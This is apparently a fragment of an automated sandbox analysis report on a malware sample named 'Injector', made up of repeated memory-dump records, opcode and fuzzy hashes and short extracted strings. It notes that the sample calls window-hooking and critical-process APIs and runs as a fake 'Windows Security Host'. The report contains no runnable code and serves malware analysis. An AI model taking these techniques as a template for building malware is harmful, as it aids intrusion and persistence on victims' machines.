                                                                                                                                                        • Opcode ID: 819a8f905991bfbf956dcd078d0df78961da2740b69ea6d50029bd3bbc821625
                                                                                                                                                        • Instruction ID: 9f35010b241605a35134a5896c93668587a335c6d924ccb6b31f28daa636d3c8
                                                                                                                                                        • Opcode Fuzzy Hash: 819a8f905991bfbf956dcd078d0df78961da2740b69ea6d50029bd3bbc821625
                                                                                                                                                        • Instruction Fuzzy Hash: 5001D65150DA892FE318A278481B9BA7BC5DF9B210F1545BEE48AC3193EC58B8074392
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1315247551.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac580000_Injector.jbxd
Strings
• String ID: O_^0$O_^2$O_^4$O_^6
• API String ID: 0-2383015730

Execution Graph

Execution Coverage: 18.4%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 33
Total number of Limit Nodes: 3
[execution_graph: node/edge dump omitted; API calls referenced in the graph: SetWindowsHookExW, RtlSetProcessIsCritical]

Control-flow Graph (blocks marked executed / not executed): function starting at 7ffaac5a2f34, which calls SetWindowsHookExW (graph layout data not reproduced).
APIs
Memory Dump Source
• Source File: 00000003.00000002.2495362336.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffaac5a0000_Windows Security Host.jbxd
Similarity
• API ID: HookWindows
• String ID:
• API String ID: 2559412058-0

Control-flow Graph (blocks marked executed / not executed): function starting at 7ffaac5a332d, which calls RtlSetProcessIsCritical (graph layout data not reproduced).
APIs
Memory Dump Source
• Source File: 00000003.00000002.2495362336.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffaac5a0000_Windows Security Host.jbxd
Similarity
• API ID: CriticalProcess
• String ID:
• API String ID: 2695349919-0

Control-flow Graph (blocks marked executed / not executed): function starting at 7ffaac5a3089, which calls SetWindowsHookExW (graph layout data not reproduced).
APIs
Memory Dump Source
• Source File: 00000003.00000002.2495362336.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffaac5a0000_Windows Security Host.jbxd
Similarity
• API ID: HookWindows
• String ID:
• API String ID: 2559412058-0
Memory Dump Source
• Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Strings
Memory Dump Source
• Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID: vX_H$yX_H
• API String ID: 0-3491284542
Strings
Memory Dump Source
• Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID: \
• API String ID: 0-2967466578
Strings
Memory Dump Source
• Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID: ^
• API String ID: 0-1590793086
Strings
Memory Dump Source
• Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID: bS
• API String ID: 0-290453937
Strings
Memory Dump Source
• Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID: +L_H
• API String ID: 0-1792215998
Strings
Memory Dump Source
• Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID: d
• API String ID: 0-2564639436
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: d
                                                                                                                                                        • API String ID: 0-2564639436
                                                                                                                                                        • Opcode ID: 7b64d1af8c845b806f8ed940f7ee8b98d4c0690b9569850765095456b7188e6d
                                                                                                                                                        • Instruction ID: ae8731d2513949c08bed88cbfdcd205be67666ed197396a1251b19f25121e016
                                                                                                                                                        • Opcode Fuzzy Hash: 7b64d1af8c845b806f8ed940f7ee8b98d4c0690b9569850765095456b7188e6d
                                                                                                                                                        • Instruction Fuzzy Hash: A4C1C07065CB468FE768DB18D441535B3E5FF96300B1489BDE08EC3696DA3AF8468B81
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: H
                                                                                                                                                        • API String ID: 0-2852464175
                                                                                                                                                        • Opcode ID: ba061c55725e47ad596d5cf7f58681ea028f5cdc9d233a6b96f2ff285f0a3bf0
                                                                                                                                                        • Instruction ID: babfd564733db14bffee8350a4df61483af64ba66ee10469d1cae50fc8c472ea
                                                                                                                                                        • Opcode Fuzzy Hash: ba061c55725e47ad596d5cf7f58681ea028f5cdc9d233a6b96f2ff285f0a3bf0
                                                                                                                                                        • Instruction Fuzzy Hash: 8DB13B61B1D94A8FFB88EB2DC84AA7537D5EF9A710B0081B9E44EC7293DD14EC4683C1
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: d
                                                                                                                                                        • API String ID: 0-2564639436
                                                                                                                                                        • Opcode ID: 742461c2ae8358a68bddc6ed2a52b0c9ae2dd625343a075950ae72fc0b637d61
                                                                                                                                                        • Instruction ID: d3bec4826f8da0d06fd5daa2c5e856a7d4533c95f8d6e2c755771df7c9134cbf
                                                                                                                                                        • Opcode Fuzzy Hash: 742461c2ae8358a68bddc6ed2a52b0c9ae2dd625343a075950ae72fc0b637d61
                                                                                                                                                        • Instruction Fuzzy Hash: 90B1DD30A58B0A8FE728DB19C445536B7E5FF9A700B548A7DE08EC3692DA35F84787C1
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: ?L_H
                                                                                                                                                        • API String ID: 0-3047738230
                                                                                                                                                        • Opcode ID: 551d3279a945e0c6bba90b5bbf74360627fe474a9400f191916f586c9c1178e1
                                                                                                                                                        • Instruction ID: 7f088d088ce36eca0d2bf0ba57af80a8b6f9ab31d8520c08337f61dad5ebd2b2
                                                                                                                                                        • Opcode Fuzzy Hash: 551d3279a945e0c6bba90b5bbf74360627fe474a9400f191916f586c9c1178e1
                                                                                                                                                        • Instruction Fuzzy Hash: DAB12320A8D7478FF764AB3684582B977D9EF47710F0481BAE06EC71C3DD6CA8598391
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: \S_H
                                                                                                                                                        • API String ID: 0-2336323542
                                                                                                                                                        • Opcode ID: dea9dfcbc5f2173f6056cf5c2b9a4ed6ab930904b60316ccfa9fd58a4578131d
                                                                                                                                                        • Instruction ID: 697424415e5c4f057adc0c5085ea36c475f990521a8919247e4537dfebab220c
                                                                                                                                                        • Opcode Fuzzy Hash: dea9dfcbc5f2173f6056cf5c2b9a4ed6ab930904b60316ccfa9fd58a4578131d
                                                                                                                                                        • Instruction Fuzzy Hash: D0716B52B5DA868FF79497BD585D6B47BC5EF9A610B0840FAE04DC72E3DD089C0A83C1
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: dL_H
                                                                                                                                                        • API String ID: 0-2846114773
                                                                                                                                                        • Opcode ID: 8caa482c0a6cccd4a1b1e1c25d14e643d5db7e8f9703564ad9271e2aeb5e24f3
                                                                                                                                                        • Instruction ID: fb6d64f711e1a91a7c0aff594187f3c10ec76b04e23a3714415196c31444d221
                                                                                                                                                        • Opcode Fuzzy Hash: 8caa482c0a6cccd4a1b1e1c25d14e643d5db7e8f9703564ad9271e2aeb5e24f3
                                                                                                                                                        • Instruction Fuzzy Hash: 8F517A2270EA4F8FE798E76D58192703BC5EB9A76070482BBE00DCB192DD18DC0A47C1
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: #T_H
                                                                                                                                                        • API String ID: 0-3176321433
                                                                                                                                                        • Opcode ID: 0cec6e49a467d5ddc9abee76a9eab8a87e6cc21cbcb18c785fb58746f17f120a
                                                                                                                                                        • Instruction ID: c31e30866f1151540519b56ae385f738649454f2c904161ea41ed04e19b7ead6
                                                                                                                                                        • Opcode Fuzzy Hash: 0cec6e49a467d5ddc9abee76a9eab8a87e6cc21cbcb18c785fb58746f17f120a
                                                                                                                                                        • Instruction Fuzzy Hash: E271FE30A5994ECFEF84DF58C495AA977E5FF69341F4041BAF40ED32A1CA29E845C780
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: rM_^
                                                                                                                                                        • API String ID: 0-700486896
                                                                                                                                                        • Opcode ID: e2a4a1ef3dac0700481f4e8a513ff88252f889b39c95904abb10d54c002db9ea
                                                                                                                                                        • Instruction ID: ee44bf7afd7b8c582e15a77fdef74571c4f0c684d75844b86a6531cf78157c25
                                                                                                                                                        • Opcode Fuzzy Hash: e2a4a1ef3dac0700481f4e8a513ff88252f889b39c95904abb10d54c002db9ea
                                                                                                                                                        • Instruction Fuzzy Hash: B051C457A4D2968BE611B77CF8A95F93F90DF46325708C1F3E08DCE1A3DC09A44A8295
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: _
                                                                                                                                                        • API String ID: 0-701932520
                                                                                                                                                        • Opcode ID: 3122353917e264ee834bdf07186176cb30cd6aab546d93fe5fdbcf31483f4151
                                                                                                                                                        • Instruction ID: 5e803ddb53786b1ab0c1bd4df9c126e148136133f464edc7a83a842c582bf16c
                                                                                                                                                        • Opcode Fuzzy Hash: 3122353917e264ee834bdf07186176cb30cd6aab546d93fe5fdbcf31483f4151
                                                                                                                                                        • Instruction Fuzzy Hash: B9314A2394D6968FE325A73CE8666E53BD4DF47220B0881F7E08DCB1A3DD0D984A83D1
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: ML_^
                                                                                                                                                        • API String ID: 0-2152338992
                                                                                                                                                        • Opcode ID: e991aeecdd9cb4dcb8008b5b01c4ed513636e99b7e98edb1d553e4a5fd82fef0
                                                                                                                                                        • Instruction ID: 28323283f936139d7f4d2b9fb10926ab7d1244b10e649c617df6c01a794e8404
                                                                                                                                                        • Opcode Fuzzy Hash: e991aeecdd9cb4dcb8008b5b01c4ed513636e99b7e98edb1d553e4a5fd82fef0
                                                                                                                                                        • Instruction Fuzzy Hash: B2219E62E8F41787F61573FEB81A4FC62849F86B65F24C232E10DC22A3CC19A44912E2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 4e31235c918a96feeae8e669221bff0a95f34ed3a2c87bb9be92f7ddf4763ee0
                                                                                                                                                        • Instruction ID: bdc9f1b790ff057b20de3636c5f475e0a401efdc1ba821fb2c10b24142e72a49
                                                                                                                                                        • Opcode Fuzzy Hash: 4e31235c918a96feeae8e669221bff0a95f34ed3a2c87bb9be92f7ddf4763ee0
                                                                                                                                                        • Instruction Fuzzy Hash: BA02B43060DA4A8FE759DB28C4556B57BE1FF95300F1482BEE48EC7292DE29E84687C1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 89f45569b6b1aa39d07b6e9d773e1317291d09331d4520b8a5df80bb8fae896b
                                                                                                                                                        • Instruction ID: 5903a4348d0d8cc80e63475f332c3cf329ab5b9eb168e824cdafc77a0cf548d3
                                                                                                                                                        • Opcode Fuzzy Hash: 89f45569b6b1aa39d07b6e9d773e1317291d09331d4520b8a5df80bb8fae896b
                                                                                                                                                        • Instruction Fuzzy Hash: D802F97061CB8A8FF754EB6884556B9B7D2FF95340F0486BEE08DC3252DE39E8458782
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 22c38f81b3380c33cfdc4d013d6253e660737512aac2d4d0a4d97dc9e5cc5af2
                                                                                                                                                        • Instruction ID: 854de03b190a0b3d1380d17b449174863878e4b823b226765a8b06ecbbe35959
                                                                                                                                                        • Opcode Fuzzy Hash: 22c38f81b3380c33cfdc4d013d6253e660737512aac2d4d0a4d97dc9e5cc5af2
                                                                                                                                                        • Instruction Fuzzy Hash: 3402D870A1CB4A8FF754EB6884556B9B7D2FF95350F0086BEE08DC3252DE39E8458782
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: b4f75918dbc43de465dd7db0b2d3d76a964dc6cd2c9bb65886a9319be7887ee8
                                                                                                                                                        • Instruction ID: 28afc6ce62e4d9c898542df68cdb90949954f1383f3654f67ba324f60ba57bd0
                                                                                                                                                        • Opcode Fuzzy Hash: b4f75918dbc43de465dd7db0b2d3d76a964dc6cd2c9bb65886a9319be7887ee8
                                                                                                                                                        • Instruction Fuzzy Hash: 96F11831B2DA4A8FF794EB2C945967877C2FFD9750B4042BAE00EC72A6ED18DC464381
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 411ad81826585ddabddd9cdf5c64e79cf90aa027b7146ec747216db589a3463a
                                                                                                                                                        • Instruction ID: 9e8802ac7ffc6d656448fb861e19c33c5027597e532b973f8f12d4cbe8ec54e9
                                                                                                                                                        • Opcode Fuzzy Hash: 411ad81826585ddabddd9cdf5c64e79cf90aa027b7146ec747216db589a3463a
                                                                                                                                                        • Instruction Fuzzy Hash: 6CF12621B5DB8ACFFB45A778541A6B87BD5EF4A650F0481FAE04DC3293DD2CE8468381
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 66f015cd357925097dc5f0724b26c1e36015a9b76ecda9240d83723bd35796bc
                                                                                                                                                        • Instruction ID: b9d01541fa02d50f52237c114ba58ca2313558edc36435f809cfd454f6f60a5d
                                                                                                                                                        • Opcode Fuzzy Hash: 66f015cd357925097dc5f0724b26c1e36015a9b76ecda9240d83723bd35796bc
                                                                                                                                                        • Instruction Fuzzy Hash: 00C11830B5DA4A8FEB84E73C84596797BD6EF5A25070541FAE04DC72A3DD2DEC068381
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 3bcd1557f7288655ae6005d9d610ba75385836be6ed700cf54421854be533cbc
                                                                                                                                                        • Instruction ID: ba3acf8bbf8cc589d1e161905ba6572411248693bad776172d629c303ab25132
                                                                                                                                                        • Opcode Fuzzy Hash: 3bcd1557f7288655ae6005d9d610ba75385836be6ed700cf54421854be533cbc
                                                                                                                                                        • Instruction Fuzzy Hash: 89D13860A4EA07CFFB29972944956B977D9EF47B10FA1817AE08FC71C2CD1DA84A43C1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: c7708a2746e18a7d6a025365e247b170a0388f9902ffdfafb0539d6fb189e80a
                                                                                                                                                        • Instruction ID: b9ff704ece4d307388acb4b1437118ff82d76cb8ec15cc316febd1a00508da16
                                                                                                                                                        • Opcode Fuzzy Hash: c7708a2746e18a7d6a025365e247b170a0388f9902ffdfafb0539d6fb189e80a
                                                                                                                                                        • Instruction Fuzzy Hash: 48C16761E1DBCBCFF7909B6994596B63FE1EF9B250B0841BAE44DC7192CD18D80AC381
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 34999b64436bed5d7c1156e20937965fe84bea0cbc6650b763ad07df57363363
                                                                                                                                                        • Instruction ID: 7eb208232e9bc46f30fb6554c6b7d4391feeab4df6b461457aedf6ead27d1053
                                                                                                                                                        • Opcode Fuzzy Hash: 34999b64436bed5d7c1156e20937965fe84bea0cbc6650b763ad07df57363363
                                                                                                                                                        • Instruction Fuzzy Hash: 13C10930A1DB4A8FEB94EB2888555B97BE5FF56350B0041BEF44EC3292DE28EC4587C1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 4bfddea47ef5b16b0ef08ad6e632b8955b400043578b8593e0a676ef1d524c2c
                                                                                                                                                        • Instruction ID: fc0f63d796f995380f06b1a8709d9d909f80fb2e8bf5867c54037b52b8dde9b5
                                                                                                                                                        • Opcode Fuzzy Hash: 4bfddea47ef5b16b0ef08ad6e632b8955b400043578b8593e0a676ef1d524c2c
                                                                                                                                                        • Instruction Fuzzy Hash: 43C14932B0E65A8FE715AB6DA8441F97794EF86721B0482B7E14DCB193DE19DC4A83C0
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 419804b614cfe9097513011a94b2e3a7f7413c1862e4c71a64686cb5891457a3
                                                                                                                                                        • Instruction ID: 08847167ba6ba2ffd4109289eed04e3ce26a0fc7efc0c322daebcefef1fa24d2
                                                                                                                                                        • Opcode Fuzzy Hash: 419804b614cfe9097513011a94b2e3a7f7413c1862e4c71a64686cb5891457a3
                                                                                                                                                        • Instruction Fuzzy Hash: A1A18D22A4DA4F4FFBA8E75CA8556B47BD5EF56360B0446FAE00DC3192DD1EE84643C0
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 44618343df6d2c6d07ddc960fc487e6cddc9c508c6154cb429a70af8c7e81793
                                                                                                                                                        • Instruction ID: e09ac46c80e4c2a618c8991ef7d257c95e17a4bb0c9f74668149db3023c98016
                                                                                                                                                        • Opcode Fuzzy Hash: 44618343df6d2c6d07ddc960fc487e6cddc9c508c6154cb429a70af8c7e81793
                                                                                                                                                        • Instruction Fuzzy Hash: 55B1A470A59A4A8FFB98EB28C454AB477D1EF55300F0481F9E40ECB297DD29EC498BD1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 4f89eed909f8899f170d4ef282cb44f1f5c083d3249f1d8f912e7af42761f7e5
                                                                                                                                                        • Instruction ID: 8db3d7d03b6fd4933860e4b7f34c8bb38ee8c87c53eabeb9385c15ef2bbfe345
                                                                                                                                                        • Opcode Fuzzy Hash: 4f89eed909f8899f170d4ef282cb44f1f5c083d3249f1d8f912e7af42761f7e5
                                                                                                                                                        • Instruction Fuzzy Hash: A3B17C62A1D74B8FF745E72C98AA5E53BD4EF56B10B0042B7F04DCB1A3DD18A84A83C5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: f426f8ed6b42958bcb6af84d4a44e886f0934b1b845bb913763b5f8888cca96d
                                                                                                                                                        • Instruction ID: 45efecb0316bcb15be03020e6104a7151a6cb0baac67496551ecb12b0847eaf5
